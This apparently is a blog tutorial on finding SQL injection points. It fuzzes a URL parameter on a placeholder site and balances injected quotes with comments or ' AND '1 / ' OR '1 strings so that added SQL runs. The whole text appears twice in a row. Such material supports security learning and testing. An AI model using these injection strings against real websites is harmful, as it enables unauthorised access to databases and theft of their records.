Continuing with our journey to identify.... Lets head towards identifying another URL and try fuzzing it.
You might think, why am I not proceeding from these point, and stuck at identifying MySQL Errors. It is very important to identify the Injection Field. My Posts Are not related to dorks, where you pick up some random URLS and Fuzz it. At any given point, If you are provided with a website you should have the capability to find and identify Injection Field, for an Attack.
So Again the last developer of the company was fired out, as Database was successfully hacked. There comes a new Developer and he re-writes the Engine.
Once again our aim is to understand how he coded it.
We have the URL:
http://www.example.com/index.php?id=1
So Our Fuzzing Starts..
http://www.example.com/index.php?id=11111111111111111 >> Blank Page
http://www.example.com/index.php?id=foooo >> Blank Page
http://www.example.com/index.php?id=1c >> Blank Page
http://www.example.com/index.php?id=c1 >> Blank Page
http://www.example.com/index.php?id=1'
Woops we broke it, We got an SQL Error. So Our First Work is Done. Now The second Part, we will try to Balance it, so that we get our Injection Field.
Now this is One type Engine, where we will find that we are not able to use the Comments to Balance the URL.
Here is a new thing that we will try.
By now, you should have noticed that the query that creates MySQL Error, we dont remove the Query, but keeping that in Place we try to balance so that our Sequence Breaking Query stays there, and we fix it by commenting.
http://www.example.com/index.php?id=1'
In SQL terms,
SELECT * FROM Table
WHERE id = _______;
http://www.example.com/index.php?id=' 1' '
Notice here the Single Quotes are not balanced, which gave the Error.
Lets say we tried:
http://www.example.com/index.php?id = ' 1' --+ '
By using the comment (--+) we say the database, hey you anything you see after me, Ignore it. so in this way the last quote gets ignored after reaching the Database. And Any Valid SQL Query Between 1' ______ --+ gets executed.
Lets assume in this case our this method it dint work, we are not able to balance the URL.
Now lets do something Else
http://www.example.com/index.php?id= ' 1' OR '1 '
It gets Balanced, because we have now Balanced it, and the OR Logic says, execute either the first part or the second part.
SELECT * FROM Table
WHERE id = '1' OR '1';
The first '1' extracts the records of id=1, and the second part OR '1' means a TRUE Statement.
Lets use now AND Statement,
http://www.example.com/index.php?id = ' 1' AND '1 '
Once again we get a valid display
http://www.example.com/index.php?id= ' 2' AND '1 '
We get the next record, and so on.
So You must remember this way of Fuzzing an URL if the earlier methods doesn't work.
So any valid Query Between ' 2' ________ AND '1 '
AND, OR is to Balance, we have balanced the Right Side, now we have to insert SQL Commands on the Left Side and the Queries Will get executed.
Conclusion: We used ' AND ' 1
http://www.example.com/index.php?id = 1
http://www.example.com/index.php?id = 1 ' AND ' 1
Thank You!
You might think, why am I not proceeding from these point, and stuck at identifying MySQL Errors. It is very important to identify the Injection Field. My Posts Are not related to dorks, where you pick up some random URLS and Fuzz it. At any given point, If you are provided with a website you should have the capability to find and identify Injection Field, for an Attack.
So Again the last developer of the company was fired out, as Database was successfully hacked. There comes a new Developer and he re-writes the Engine.
Once again our aim is to understand how he coded it.
We have the URL:
http://www.example.com/index.php?id=1
So Our Fuzzing Starts..
http://www.example.com/index.php?id=11111111111111111 >> Blank Page
http://www.example.com/index.php?id=foooo >> Blank Page
http://www.example.com/index.php?id=1c >> Blank Page
http://www.example.com/index.php?id=c1 >> Blank Page
http://www.example.com/index.php?id=1'
Woops we broke it, We got an SQL Error. So Our First Work is Done. Now The second Part, we will try to Balance it, so that we get our Injection Field.
Now this is One type Engine, where we will find that we are not able to use the Comments to Balance the URL.
Here is a new thing that we will try.
By now, you should have noticed that the query that creates MySQL Error, we dont remove the Query, but keeping that in Place we try to balance so that our Sequence Breaking Query stays there, and we fix it by commenting.
http://www.example.com/index.php?id=1'
In SQL terms,
SELECT * FROM Table
WHERE id = _______;
http://www.example.com/index.php?id=' 1' '
Notice here the Single Quotes are not balanced, which gave the Error.
Lets say we tried:
http://www.example.com/index.php?id = ' 1' --+ '
By using the comment (--+) we say the database, hey you anything you see after me, Ignore it. so in this way the last quote gets ignored after reaching the Database. And Any Valid SQL Query Between 1' ______ --+ gets executed.
Lets assume in this case our this method it dint work, we are not able to balance the URL.
Now lets do something Else
http://www.example.com/index.php?id= ' 1' OR '1 '
It gets Balanced, because we have now Balanced it, and the OR Logic says, execute either the first part or the second part.
SELECT * FROM Table
WHERE id = '1' OR '1';
The first '1' extracts the records of id=1, and the second part OR '1' means a TRUE Statement.
Lets use now AND Statement,
http://www.example.com/index.php?id = ' 1' AND '1 '
Once again we get a valid display
http://www.example.com/index.php?id= ' 2' AND '1 '
We get the next record, and so on.
So You must remember this way of Fuzzing an URL if the earlier methods doesn't work.
So any valid Query Between ' 2' ________ AND '1 '
AND, OR is to Balance, we have balanced the Right Side, now we have to insert SQL Commands on the Left Side and the Queries Will get executed.
Conclusion: We used ' AND ' 1
http://www.example.com/index.php?id = 1
http://www.example.com/index.php?id = 1 ' AND ' 1
Thank You!
0 comments:
Post a Comment